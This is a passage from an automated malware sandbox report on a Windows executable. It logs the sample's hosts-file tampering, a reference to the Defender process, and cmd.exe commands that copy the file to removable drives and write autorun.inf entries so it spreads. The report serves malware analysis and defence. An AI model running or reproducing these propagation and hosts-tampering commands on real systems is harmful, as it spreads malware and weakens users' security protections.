ep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noret
urn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,S 0_2_002029B0
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A128 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0020A128
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_00209D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00209D74
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A28D SetUnhandledExceptionFilter, 0_2_0020A28D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\IPrstVM17M.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_00209F44 cpuid 0_2_00209F44
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A2FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0020A2FC

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\IPrstVM17M.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: IPrstVM17M.exe, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe